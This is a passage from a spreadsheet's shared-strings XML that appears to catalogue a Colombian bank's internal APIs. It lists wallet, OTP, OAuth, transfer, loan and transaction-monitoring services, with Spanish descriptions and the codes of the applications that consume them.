 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Tec - Transfer - Management</t>
  </si>
  <si>
    <t>tec-transfer-management</t>
  </si>
  <si>
    <t>Tec-Wallet</t>
  </si>
  <si>
    <t>Tec - Wallet - Transactional - Log</t>
  </si>
  <si>
    <t>tec-wallet-transactional-log</t>
  </si>
  <si>
    <t>Con esta API se permitirá consultar la información de las novedades aplicadas de los clientes registrados en la Nueva Billetera.   Estas novedades incluyen:   - Registro del cliente en la billetera - Tarjetas del cliente en la billetera  - Tarjetas activas del cliente en la billetera - Tarjetas visibles del cliente en la billetera  - Tarjetas ocultas del cliente en la billetera - Tarjeta seleccionada como favorita por el cliente en la billetera (para pagos con NFC)</t>
  </si>
  <si>
    <t>Tec - Wallet Channel Customers</t>
  </si>
  <si>
    <t>Tec - Wallet Channel Customers - Customer Cards</t>
  </si>
  <si>
    <t>tec-wallet-channel-customers-customer-cards</t>
  </si>
  <si>
    <t>Con esta API se permitirá consultar la información de registro de un cliente en la Nueva Billetera.</t>
  </si>
  <si>
    <t>Tec - Wallet Channel Customers - Customer Enrollment</t>
  </si>
  <si>
    <t>tec-wallet-channel-customers-customer-enrollment</t>
  </si>
  <si>
    <t xml:space="preserve">Con esta API se permitirá consultar la información de las tarjetas de los clientes registradas en la Nueva Billetera. La búsqueda se puede realizar por los datos de identificación del cliente, el identificador de la billetera (wallet ID), o el identificador de la tarjeta en la billetera (card ID). </t>
  </si>
  <si>
    <t>Tec - Wallet Channel Customers  Customer Enrollment History</t>
  </si>
  <si>
    <t>tec-wallet-channel-customers-customer-enrollment-history</t>
  </si>
  <si>
    <t>Con esta API se permitirá consultar la información histórica de registro de los clientes en la nueva billetera. Tiene la opción de consultar la información histórica de un cliente (Todas las billeteras que ha tenido), o la consulta de todos los clientes registrados en el canal.</t>
  </si>
  <si>
    <t>Tec - Wallet Customers - Customer Purchases</t>
  </si>
  <si>
    <t>tec-wallet-customers-customer-purchases</t>
  </si>
  <si>
    <t>Esta API permite consultar las compras realizadas por los clientes a través de la Nueva Billetera con las tecnologí­as habilitadas para pagos. â€¢	QR â€¢	NFC (Sólo se habilitará cuando se puedan realizar pagos con NFC)</t>
  </si>
  <si>
    <t>Tec - Wallet Customers - Wallet Customers Management</t>
  </si>
  <si>
    <t>tec-wallet-customers-wallet-customers-management</t>
  </si>
  <si>
    <t>Esta API permite exponer las diferentes capacidades para gestionar los clientes en la billetera móvil. Inicialmente, la API tendrá las siguientes capacidades: â€¢	Bloquear o desbloquear por seguridad una billetera de un cliente â€¢	Cancelar definitivamente la billetera si el cliente así­ lo solicita o cuando el área de seguridad detecte una vulnerabilidad (fraude confirmado o movimientos inusuales).</t>
  </si>
  <si>
    <t>Tec-Business Opportunities</t>
  </si>
  <si>
    <t>Tec-Branch Commercial Team</t>
  </si>
  <si>
    <t>tec-branch-commercial-team</t>
  </si>
  <si>
    <t>La Api ofrece a los consumidores, la capacidad de obtener la información de los códigos CIF y CRM del equipo comercial de una sucursal, es decir: su gerente, los asesores o vendedores y la identificación o código de la sucursal.</t>
  </si>
  <si>
    <t>ConsultaDatosComercialesSucursal/V1.0</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd _x000D_
 VisorInteractivo_AW1249</t>
  </si>
  <si>
    <t>Tec-Business Opportunities - SME Generals Inquiry</t>
  </si>
  <si>
    <t>tec-business-opportunities-generals-inquiry</t>
  </si>
  <si>
    <t>Tec-Business Opportunities - SME Management</t>
  </si>
  <si>
    <t>tec_business_opportunities_SME_management</t>
  </si>
  <si>
    <t>Tec-Business Opportunities - SME PreApproved Inquiry</t>
  </si>
  <si>
    <t>tec-business-opportunities-sme-preapproved-inquiry</t>
  </si>
  <si>
    <t>Tec-Business Opportunities MasterData</t>
  </si>
  <si>
    <t>tec-business-opportunities-masterdata</t>
  </si>
  <si>
    <t>Tec-Business Opportunities Persons - Generals</t>
  </si>
  <si>
    <t>tec-business-opportunities-persons-generals</t>
  </si>
  <si>
    <t>Tec-Business Opportunities Persons - Management</t>
  </si>
  <si>
    <t>tec_business_opportunities_persons_management</t>
  </si>
  <si>
    <t>Tec-Business Opportunities Persons-Preapproved</t>
  </si>
  <si>
    <t>tec-business-opportunities-persons-preapproved</t>
  </si>
  <si>
    <t>Tec-Channels</t>
  </si>
  <si>
    <t>Tec-Channel - Service Points</t>
  </si>
  <si>
    <t>service-points</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd _x000D_
 BALMTEC_AW0955 _x000D_
 BCHerramientasMonitoreoPrd2 _x000D_
 TABOT_AW1165001 _x000D_
 NEQUIMAPAS_AW1011</t>
  </si>
  <si>
    <t>HabitatCore_AW1281003 _x000D_
 JornadaPagos_AW1316001</t>
  </si>
  <si>
    <t>Tec-Commerce portal - Transaction Log</t>
  </si>
  <si>
    <t>tec-commerce-portal-transaction-log</t>
  </si>
  <si>
    <t>Tec-Customer - Amount Limit Management</t>
  </si>
  <si>
    <t>tec-customer-amount-limit-management</t>
  </si>
  <si>
    <t>Esta API permite gestionar los topes que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el dí­a o mes según sea el caso. Para esto, el servicio permitirá consultar el monto lí­mite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco y permitirá tener un acumulado de las transacciones hechas por el cliente durante el dí­a para poder determinar hasta qué momento puede debitarse de sus cuentas.</t>
  </si>
  <si>
    <t>Tec-Customer - Basic Information</t>
  </si>
  <si>
    <t>tec-customer-basic-information</t>
  </si>
  <si>
    <t>La Api Tec-Customer - Basic Information permite la consulta de información Basica de un cliente sea persona natural o jurí­dica.</t>
  </si>
  <si>
    <t>Customer Sufi</t>
  </si>
  <si>
    <t>Tec-Customer Data Sufi - Management</t>
  </si>
  <si>
    <t>tec-customer-data-sufi-Management</t>
  </si>
  <si>
    <t>Tec-Customer Data Sufi - Retrieve</t>
  </si>
  <si>
    <t>tec-customer-data-sufi-retrieve</t>
  </si>
  <si>
    <t>Products</t>
  </si>
  <si>
    <t>Tec-Customer Products Natural Person</t>
  </si>
  <si>
    <t>tec-customer-products-natural-person</t>
  </si>
  <si>
    <t>ConsultaProductosClientePersonas/V1.0</t>
  </si>
  <si>
    <t>PORTALCOBRANZA_AW1294001 _x000D_
 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Tec-Deposit-Accounts</t>
  </si>
  <si>
    <t>tec-deposit-accounts</t>
  </si>
  <si>
    <t>Services that allows get information about deposit accounts</t>
  </si>
  <si>
    <t>ConsultaExtendidaDeSaldos/V1.0
ConsultaMovimientoDepositos/V1.0
ConsultaSaldosCuentasDepositos/V3.0</t>
  </si>
  <si>
    <t>Tec-Devices</t>
  </si>
  <si>
    <t>Tec-Device - Authenticate Customer OTP</t>
  </si>
  <si>
    <t>tec-devices-autenticate-customer-otp</t>
  </si>
  <si>
    <t>Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnologí­a que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID. El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID.</t>
  </si>
  <si>
    <t>AutenticarClienteOTP/V2.0</t>
  </si>
  <si>
    <t>TMP EDIN APP_AW1276001 _x000D_
 BC_Herramientas_Monitoreo _x000D_
 App inversionesGB_AW1185001</t>
  </si>
  <si>
    <t>Tec-Devices - Enroll Customer OTP</t>
  </si>
  <si>
    <t>tec-devices-enroll-customer-otp</t>
  </si>
  <si>
    <t>Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnologí­a que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID, para poder hacer uso de este es necesario enrolarse o matricularse, para eso se expone esta API â€œEnroll Customer OTPâ€?.  La cual permite iniciar el registro de un dispositivo móvil para un cliente especí­fico, enviando un código de activación por el mecanismo definido en DetectID. Este código de activación permitirá vincular el dispositivo móvil. Este código se genera a partir de las configuraciones definidas del canal especificado; sin embargo, una vez que el código de activación es empleado, el dispositivo será registrado en todos los canales, es decir, si un usuario es asociado a otro canal, podrá utilizar su mismo dispositivo sin registrarlo nuevamente. Existen 3 posibles formas de usar este OTP, por Softoken, SMS o email (estos últimos dos son conocidos como ODA), de acuerdo al mecanismo que se desee utilizar es necesario matricularse de forma particular en ese.</t>
  </si>
  <si>
    <t>EnrolarClienteOTP/V2.0</t>
  </si>
  <si>
    <t>Tec-Edpyme channel</t>
  </si>
  <si>
    <t>Tec-Edpyme channel - customer information</t>
  </si>
  <si>
    <t>tec-edpyme-channel-customer-information</t>
  </si>
  <si>
    <t>Esta API permitirá exponer las diferentes consultas que desde el canal Edpyme se requieren para la administración del canal desde el Modulo Administrativo u otros canales o consumidores que requieran hacer uso de estas funcionalidades</t>
  </si>
  <si>
    <t>Technical Parameters</t>
  </si>
  <si>
    <t>Servicio para la gestión de parámetros técnicos de la plataforma D2B</t>
  </si>
  <si>
    <t>Tec-Investments Channel</t>
  </si>
  <si>
    <t>Tec-Investments Channel - customer information</t>
  </si>
  <si>
    <t>tec-investments-channel-customer-information</t>
  </si>
  <si>
    <t>Esta API permitirá exponer las diferentes consultas relacionadas con la información de un cliente del canal de inversiones y de esta manera permitir la administración desde el Módulo Administrativo u otros consumidores.</t>
  </si>
  <si>
    <t>Tec-Investments Channel - Customers Management</t>
  </si>
  <si>
    <t>tec-investments-channel-customers-management</t>
  </si>
  <si>
    <t>Tec-Loans  Agreements Enquiry</t>
  </si>
  <si>
    <t>tec-loans-agreements-enquiry</t>
  </si>
  <si>
    <t>Tec-Loans Customer Information</t>
  </si>
  <si>
    <t>tec-loans-customer-information</t>
  </si>
  <si>
    <t>El API tiene como objetivo permitir la consulta detallada de un préstamo asociada a un cliente</t>
  </si>
  <si>
    <t>ConsultaInformacionPrestamos/V1.0</t>
  </si>
  <si>
    <t>Tec-Loans Sufi Management</t>
  </si>
  <si>
    <t>tec-loans-sufi-management</t>
  </si>
  <si>
    <t>API para acceder a las operaciones asociadas a la administración de las obligaciones de un cliente de suf</t>
  </si>
  <si>
    <t>Tec-Loans Sufi Retrievet</t>
  </si>
  <si>
    <t>tec-loans-sufi-retrievet</t>
  </si>
  <si>
    <t>Tec-Mortgage Loans</t>
  </si>
  <si>
    <t>Tec-Mortgage Loans  Obligations</t>
  </si>
  <si>
    <t>tec-mortgage-loans-obligations</t>
  </si>
  <si>
    <t>En su versión inicial, esta API expone una capacidad que permite realizar consultas detalladas para obligaciones hipotecarias, a partir del numero de la obligacion.</t>
  </si>
  <si>
    <t>ObligacionesHipotecario/V1.0</t>
  </si>
  <si>
    <t>Tec-Notifications</t>
  </si>
  <si>
    <t>Tec-Notifications  Send Alerts And Notifications</t>
  </si>
  <si>
    <t>tec-notifications-send-alerts-and-notifications</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd _x000D_
 CapaGestionCanal_NU0014001 _x000D_
 Tokenizacion_NU0019001 _x000D_
 Recargas_AW1300001 _x000D_
 Tokenizacion_NU0103001</t>
  </si>
  <si>
    <t>Tec-OAuth - Provider from DID</t>
  </si>
  <si>
    <t>tec-oauth-did</t>
  </si>
  <si>
    <t>Permite realizar la validación de la sesion de un usuario en los canales virtuales y del OTP generado por clave dinamica, y entregar un token de acceso</t>
  </si>
  <si>
    <t xml:space="preserve">                                              </t>
  </si>
  <si>
    <t>Tec-OAuth - Provider from OTP</t>
  </si>
  <si>
    <t>tec-oauth-otp</t>
  </si>
  <si>
    <t>Esta API de OAuth permite generar un token de autorización en APIC a partir del Id de sesión generados en los canales con los servicios de WAS cambiar código por token</t>
  </si>
  <si>
    <t>Tec-OAuth - Provider from WAS SessionId</t>
  </si>
  <si>
    <t>tec-oauth-sessionid</t>
  </si>
  <si>
    <t>Tec-OAuth-Provider From Simple Customer Authentication</t>
  </si>
  <si>
    <t>tec-oauth-provider-from-simple-customer-authentication</t>
  </si>
  <si>
    <t>Esta API de OAuth permite generar un token de autorización en APIConnect a partir del id de sesión generado en el WAS, Token generado por AutenticacionCliente en Datapower.</t>
  </si>
  <si>
    <t>Tec-Reference Data Management</t>
  </si>
  <si>
    <t>Tec-Reference Data Management - Util Reference Information</t>
  </si>
  <si>
    <t>tec-reference-data-management-util-reference-information</t>
  </si>
  <si>
    <t>Consulta de información de referencia necesaria para la gestión de las entidades del producto de gestión de nómina, inicialmente se plantean consulta de: Departamentos, ciudades, bancos, cajas de compensación, EPS, fondos de pensiones, ARLs, fondos de cesantí­as, operadores de seguridad social y software contables.</t>
  </si>
  <si>
    <t>EDPYME_AW1170 _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 CapaGestionCanal_NU0014001</t>
  </si>
  <si>
    <t>Tec-Security WAS</t>
  </si>
  <si>
    <t>Tec-Security - Code Validation</t>
  </si>
  <si>
    <t>tec-security-code-validation</t>
  </si>
  <si>
    <t>TMP_SVP_APP_PFM _x000D_
 TMP Boton Bancolombia_BDT _x000D_
 BC_Herramientas_Monitoreo _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 TMP SOPORTE APP_lgcorrg _x000D_
 MarketplaceEcosistemasPersonas_NU0035001 _x000D_
 FUA_AW1291001</t>
  </si>
  <si>
    <t>Tec-Token</t>
  </si>
  <si>
    <t>Tec-Token - Management</t>
  </si>
  <si>
    <t>tec-token-management</t>
  </si>
  <si>
    <t>API que permite la gestión del token para clientes y no clientes, utilizado por cualquier aplicación que requiere hacer uso de una autenticación OTP mediante la generación de un token. Esta generación de un token puede ser enviado ví­a celular como un mensaje de texto o al correo electrónico permitiéndole el uso de una plantilla para el mensaje; para así­ autenticar el cliente.</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd _x000D_
 plink_AW1206001</t>
  </si>
  <si>
    <t>Tec-Transaction</t>
  </si>
  <si>
    <t>Tec-Transaction-Transactional Monitoring</t>
  </si>
  <si>
    <t>tec-transaction-transactional-monitoring</t>
  </si>
  <si>
    <t>La API â€œMonitoreo Transaccionalâ€? ofrece la capacidad de evaluar las transacciones permitiendo calificar  el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas. Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma. Esta API de evaluación se puede solicitar desde diferentes canales, no solo desde el canal de Internet, sino por ejemplo desde el canal móvil. Adicional, esta podrí­a monitorear cualquier transacción, pero debe ser validado con la Dirección de Gestión de Fraude.</t>
  </si>
  <si>
    <t>App inversionesGB_AW1185001 _x000D_
 BC_Herramientas_Monitoreo</t>
  </si>
  <si>
    <t>App inversionesGB_AW1185001</t>
  </si>
  <si>
    <t>Third Party Authentication</t>
  </si>
  <si>
    <t>Third Party Authentication - Management</t>
  </si>
  <si>
    <t>third-party-authentication-management</t>
  </si>
  <si>
    <t>Entregara al tercero la URL delformulario de autenticacion</t>
  </si>
  <si>
    <t>BancolombiaPay_AW1435001 _x000D_
 TestAPIConnectPDN</t>
  </si>
  <si>
    <t>Third Party Authorization</t>
  </si>
  <si>
    <t>Third Party Authorization - Information</t>
  </si>
  <si>
    <t>third-party-authorization-information</t>
  </si>
  <si>
    <t>El API permite consultar el detalle de las relaciones que tiene un cliente con el comercio y producto donde se detalla la autorización que tiene para poder tranzar con los comercios y productos registrados</t>
  </si>
  <si>
    <t>BancolombiaPay_AW1435001 _x000D_
 MascaraTransaccional_NU0021001</t>
  </si>
  <si>
    <t>Third Party Authorization - Management</t>
  </si>
  <si>
    <t>third-party-authorization-management</t>
  </si>
  <si>
    <t>gestionar las autorizaciones que un cliente puede entregar a un tercero sobre los productos que tiene en banco</t>
  </si>
  <si>
    <t>Token</t>
  </si>
  <si>
    <t>Token - Management</t>
  </si>
  <si>
    <t>token-management</t>
  </si>
  <si>
    <t>ALM_AW0955001 _x000D_
 ALM_AW0955 _x000D_
 EASYHOME_NU0004001 _x000D_
 JornadaDepositos_NU0104001 _x000D_
 ConfirmacionOpCadena_NU0127001 _x000D_
 VINCUTRANS_NU0034001 _x000D_
 NETWORKING_NU0046001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 ConsumerOTP_AW0660 _x000D_
 BancolombiaPay_AW1435001 _x000D_
 PreaprobadosSucursales_AW1299001</t>
  </si>
  <si>
    <t>Token OTP - Token Validating</t>
  </si>
  <si>
    <t>otp-interno-autenticacion</t>
  </si>
  <si>
    <t>API para validar token OTP</t>
  </si>
  <si>
    <t>Trade Finance</t>
  </si>
  <si>
    <t>Trade Finance - Commission Rates</t>
  </si>
  <si>
    <t>trade-finance--commission-rates</t>
  </si>
  <si>
    <t>El API servicio Trade Finance  Commission Rates tiene como objetivo consultar una comisión en especí­fico. En este servicio se toman en cuenta todas las comisiones que se tienen en las Filiales del Exterior</t>
  </si>
  <si>
    <t>GestionComisionesFiliales/V1.0</t>
  </si>
  <si>
    <t>TMP1 johucorr_AW1185001</t>
  </si>
  <si>
    <t>Transaccion Token InvestBot</t>
  </si>
  <si>
    <t>El servicio Transaccion Token Investbot, permite generar un token de transacción para poder realizar transacciones (consulta de productos de un cliente o hacer transferencias) en valores desde InvestBot.</t>
  </si>
  <si>
    <t>Transacciones Medios De Pago</t>
  </si>
  <si>
    <t>El servicio Transacciones Medios de Pago permite ejecutar transacciones monetarias a través del Motor de Pagos de Medios de pago. Estas transacciones cuentan con reglas de negocio propias del proveedor (por ejemplo, la capacidad de acreditar tiene la opción de enviar una notificación adicional a las que se tienen por defecto con Alertas y Notificaciones para el pagador y el receptor del dinero), por lo cual se debe validar funcionalmente antes de solicitar su re-uso.</t>
  </si>
  <si>
    <t>ECP_ISECP0001</t>
  </si>
  <si>
    <t>Transactions Limit</t>
  </si>
  <si>
    <t>Transactions Limit - Maximum Transaction Amounts</t>
  </si>
  <si>
    <t>transactions-limit-maximum-transaction-amounts</t>
  </si>
  <si>
    <t>API para la gestión de topes monetarios que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el dí­a o mes segíºn sea el caso. Las funcionalidades expuestas permiten:     - Actualizar el acumulado de las transacciones hechas por el cliente durante el dí­a para poder determinar hasta que momento puede debitarse de sus cuentas.   - Consultar el monto lí­mite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco.    -  Reversar las transacciones en caso de que se requiera.    - Validar las transacciones, con el fin de determinar si se puede o no realizar una transacción monetaria.</t>
  </si>
  <si>
    <t>GestionDeTopesMontosClientes/V2.0</t>
  </si>
  <si>
    <t>ALM_AW0955001 _x000D_
 ALM_AW0955001 _x000D_
 BancolombiaPay_AW1435001</t>
  </si>
  <si>
    <t>Transactions Limits</t>
  </si>
  <si>
    <t>Transactions Limits - Transaction Limit Amount</t>
  </si>
  <si>
    <t>transactions-limits-transaction-limit-amount</t>
  </si>
  <si>
    <t>BancolombiaPay_AW1435001</t>
  </si>
  <si>
    <t>Transaction</t>
  </si>
  <si>
    <t>Transaction-Transactional Monitoring</t>
  </si>
  <si>
    <t>transaction-transactional-monitoring</t>
  </si>
  <si>
    <t>La API 'Monitoreo Transaccional'? ofrece la capacidad de evaluar las transacciones permitiendo calificar el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas. Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma. Esta API de evaluación se puede solicitar desde diferentes canales, no solo desde el canal de Internet, sino por ejemplo desde el canal móvil. Adicional, esta podrí­a monitorear cualquier transacción, pero debe ser validado con la Dirección de Gestión de Fraude.</t>
  </si>
  <si>
    <t>EDPYME_AW1170</t>
  </si>
  <si>
    <t>EDPYME_AW1170 _x000D_
 AW1333002_Transaction_Monitoreo _x000D_
 AW1333002_Transaction_Monitoreo _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>El API de monitoreo transaccional, permite realizar el rastreo a las transacciones que realiza un cliente en los diferentes canales banco. La prevención  a nivel de financiación es fundamental y un insumo de este rastreo es el comportamiento de nuestros clientes, por esto, por medio de la evaluación de su actividad sabemos si hay algo inusual por lo que debamos general alertas de riesgos, y a su vez poder almacenar la información del estado final de la misma.  La API 'Monitoreo Transaccional'? ofrece la capacidad de evaluar las transacciones permitiendo calificar el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica, aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas.  Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma.</t>
  </si>
  <si>
    <t>Transferencia Cuentas Deposito</t>
  </si>
  <si>
    <t>El servicio Transferencia Cuentas Deposito tiene como objetivo realizar transferencia en línea entre cuentas depósitos (Cuenta Ahorro a Cuenta Ahorro y Cuenta Corriente y viceversa).</t>
  </si>
  <si>
    <t>AW0638 _x000D_
AW1269001 _x000D_
AW1170</t>
  </si>
  <si>
    <t>Transferencia Fondos Banco ABanca Digital</t>
  </si>
  <si>
    <t>Este servicio tiene como alcance realizar transferencia de fondos desde una cuenta Bancolombia a una cuenta de Banca Digital ( Nequi)</t>
  </si>
  <si>
    <t>Transferencias Cuentas Depositos</t>
  </si>
  <si>
    <t>El servicio TransferenciasCuentasDepositos habilita las capacidades relacionadas con los movimientos monetarios entre cuentas como, por ejemplo: débitos, créditos, transferencias y la anulación de cada uno de estos movimientos según se requiera.</t>
  </si>
  <si>
    <t>AW0000852 _x000D_
AW1373 _x000D_
NU0010001 _x000D_
AW1365 _x000D_
AW0000125 _x000D_
PRODUCTORCONSUMIDOR _x000D_
NU0094001 _x000D_
NU0166001 _x000D_
AW0360006 _x000D_
ISRDI001 _x000D_
AW0955001 _x000D_
AW1435001 _x000D_
AW1300001 _x000D_
AW1404002 _x000D_
AW1277001</t>
  </si>
  <si>
    <t>Transferencias De Bolsillos</t>
  </si>
  <si>
    <t>El Servicio TransferenciasDeBolsillos habilita las capacidades Monetarias sobre los bolsillos de una cuenta de ahorros como, por ejemplo, adicionar a un bolsillo, retirar de un bolsillo o transferir entre bolsillos.</t>
  </si>
  <si>
    <t>Transferencias De Fondos</t>
  </si>
  <si>
    <t>El servicio Transferencias de fondos tiene como objetivo realizar transferencia en línea entre cuentas depósitos (Cuenta Ahorro a Cuenta Ahorro y Cuenta Corriente y viceversa) entre cuentas de la filial o cuentas externas.</t>
  </si>
  <si>
    <t>AW1276001 _x000D_
APIC _x000D_
AW1185001 _x000D_
AW0360010</t>
  </si>
  <si>
    <t>Transferencias Otros Bancos</t>
  </si>
  <si>
    <t>El servicio Transferencias Otros Bancos permitirá gestionar las operaciones asociadas a otros bancos a traves del sistema ACH como lo son crear beneficiarios, enviar transferencias a otros bancos y anular transferencias a otros bancos.</t>
  </si>
  <si>
    <t>Transmision Contenido Documental</t>
  </si>
  <si>
    <t>Servicio que permite realizar contribución o carga    de archivos directamente al Gestor Documental WCC del Banco</t>
  </si>
  <si>
    <t>AW0659</t>
  </si>
  <si>
    <t>Trasferencias InvestBot</t>
  </si>
  <si>
    <t>El servicio Transferencias Investbot, permite hacer transferencias de dinero desde FIC (Fondos de Inversión Colectiva) valores, Cunetas multiproductos Valores y Cuentas de ahorros y corrientes hacia la cuenta de investbot.</t>
  </si>
  <si>
    <t>Trust</t>
  </si>
  <si>
    <t>Trust - Trusts</t>
  </si>
  <si>
    <t>trust-trusts</t>
  </si>
  <si>
    <t>Esta API permite consultar la información de los fideicomisos de los clientes que tienen bienes administrados y gestionados por Fiduciaria Bancolombia.</t>
  </si>
  <si>
    <t>Validacion Cuentas Nequi</t>
  </si>
  <si>
    <t>Este servicio permitirá validar con el número de documento y tipo de documento si un cliente tiene cuenta vigente en Nequi.</t>
  </si>
  <si>
    <t>Validar Codigo Seguridad</t>
  </si>
  <si>
    <t>Permitir que el usuario valide el código de seguridad que fue generado cuando solicitó la regeneración de la clave.</t>
  </si>
  <si>
    <t>Validar Cuenta</t>
  </si>
  <si>
    <t>Permitir consultar las cuentas tanto de ahorro, corriente y AFC de los clientes para validar, que dicha cuenta exista, que permita que se le apliquen Créditos (Desembolsos), que permita que se le realicen Débitos (Débito Automático), que no esté bloqueada, y que si es una cuenta AFC, de ahorros o corriente.</t>
  </si>
  <si>
    <t>AW0709001 _x000D_
AW01010</t>
  </si>
  <si>
    <t>Vehicle Credit Study</t>
  </si>
  <si>
    <t>Vehicle Credit - Final Study</t>
  </si>
  <si>
    <t>vehicle-credit-final-study</t>
  </si>
  <si>
    <t>MonitoreoDCM_AAA _x000D_
 CarventuriApiVehiculos_AW1097001 _x000D_
 PuntoAliadoApiVehiculos_AW1097001</t>
  </si>
  <si>
    <t>Vehicle Credit - Manual Study</t>
  </si>
  <si>
    <t>vehicle-credit-manual-study</t>
  </si>
  <si>
    <t>API publica que permite registrar la información adicional en que caso de requerirse un estudio manual para el crédito de vehiculo. Esta API se toma como una tercera familia de apis, con tres capacidades que se irán ejecutando secuencialmente. Una vez realizado este registro de datos para el estudio manual, se entrega una respuesta indicando que se realizará el estudio. Esta APIs esta especificada en el contexto funcional de SUFI-Vehiculos.</t>
  </si>
  <si>
    <t>Vehicle Credit - Preliminary Study</t>
  </si>
  <si>
    <t>vehicle-credit-preliminary-study</t>
  </si>
  <si>
    <t>Vehicle Credit Study - Authorization</t>
  </si>
  <si>
    <t>vehicle-credit-study-authorization</t>
  </si>
  <si>
    <t>Proveedor de OAuth2 para autorización de las APIs de estudio de crédito de vehí­culo</t>
  </si>
  <si>
    <t>Vehicle Loan Sufi</t>
  </si>
  <si>
    <t>Vehicle Information</t>
  </si>
  <si>
    <t>vehicle-information</t>
  </si>
  <si>
    <t>API que ofrece capacidades sobre el vehí­culo para el cual fue aprobado un crédito como la consulta de la información del vehí­culo, el registro, consulta y levantamiento de contrato de prenda en las secretarias de transito de Colombia, de manera que se puedan adelantar cualquier tipo de tramites en lí­nea.</t>
  </si>
  <si>
    <t>Tramites_Digitales_AW1081001_SUFI_APM _x000D_
 Monitoreo_AW1081001</t>
  </si>
  <si>
    <t>Vender Divisas</t>
  </si>
  <si>
    <t>Soportar la funcionalidad de negociaciones de Divisas realizadas entre el banco y sus clientes.</t>
  </si>
  <si>
    <t>Verificacion Codigo Autorizacion</t>
  </si>
  <si>
    <t>El servicio Verificación Código Autorización permite a los consumidores hacer la validación del código de autorización retornado en el proceso de autenticación de un cliente, para garantizar el acceso a diferentes funcionalidades. _x005F_x000D_ Actualmente Implementado en IIB10</t>
  </si>
  <si>
    <t>AW1189001 _x000D_
BIM</t>
  </si>
  <si>
    <t>Verificar Producto</t>
  </si>
  <si>
    <t>Para el proceso de autogestión que realizan los clientes desde la sucursal virtual (eBanking), se requiere poder verificar en el HUB de Información si un determinado producto pertenece a un cliente.</t>
  </si>
  <si>
    <t>Wallet</t>
  </si>
  <si>
    <t>Wallet - Transactional Log</t>
  </si>
  <si>
    <t>wallet-transactional-log</t>
  </si>
  <si>
    <t>Wallet Customers</t>
  </si>
  <si>
    <t>Wallet Customers - Cards</t>
  </si>
  <si>
    <t>wallet-customers-cards</t>
  </si>
  <si>
    <t xml:space="preserve">Con esta API se permitirá consultar la información de las tarjetas de los clientes registradas en la Nueva Billetera. La bíºsqueda se puede realizar por los datos de identificación del cliente, el identificador de la billetera (wallet ID), o el identificador de la tarjeta en la billetera (card ID). </t>
  </si>
  <si>
    <t>Wallet Customers - Enrollment</t>
  </si>
  <si>
    <t>wallet-customers-enrollment</t>
  </si>
  <si>
    <t>Wallet Customers - Enrollment History</t>
  </si>
  <si>
    <t>wallet-customers-enrollment-history</t>
  </si>
  <si>
    <t>Wallet Customers - Management</t>
  </si>
  <si>
    <t>wallet-customers-management</t>
  </si>
  <si>
    <t>Esta API permite exponer las diferentes capacidades para gestionar los clientes en la billetera móvil. Inicialmente, la API tendrá las siguientes capacidades: '¢	Bloquear o desbloquear por seguridad una billetera de un cliente '¢	Cancelar definitivamente la billetera si el cliente así­ lo solicita o cuando el área de seguridad detecte una vulnerabilidad (fraude confirmado o movimientos inusuales).</t>
  </si>
  <si>
    <t>Wallet Customers - Purchases</t>
  </si>
  <si>
    <t>wallet-customers-purchases</t>
  </si>
  <si>
    <t>Esta API permite consultar las compras realizadas por los clientes a través de la Nueva Billetera con las tecnologí­as habilitadas para pagos. '¢	QR '¢	NFC (Sólo se habilitará cuando se puedan realizar pagos con NFC)</t>
  </si>
  <si>
    <t>WSP_ALM</t>
  </si>
  <si>
    <t>Web Service Proxy</t>
  </si>
  <si>
    <t>WSP_AXI_AutServidor</t>
  </si>
  <si>
    <t>WSP_AXI_SincServidor</t>
  </si>
  <si>
    <t>WSP_AXI_SincServidorV2</t>
  </si>
  <si>
    <t>WSP_BancaDigital</t>
  </si>
  <si>
    <t>WSP_CMA_TOKEN</t>
  </si>
  <si>
    <t>WSP_ERROR_ADAPTER_DP</t>
  </si>
  <si>
    <t>WSP_GFE_GESTIONFACTURAELECTRONICA_CEN</t>
  </si>
  <si>
    <t>WSP_IC_CONSULTARINFORMACIONPRODUCTOCLIENTE_CIPC</t>
  </si>
  <si>
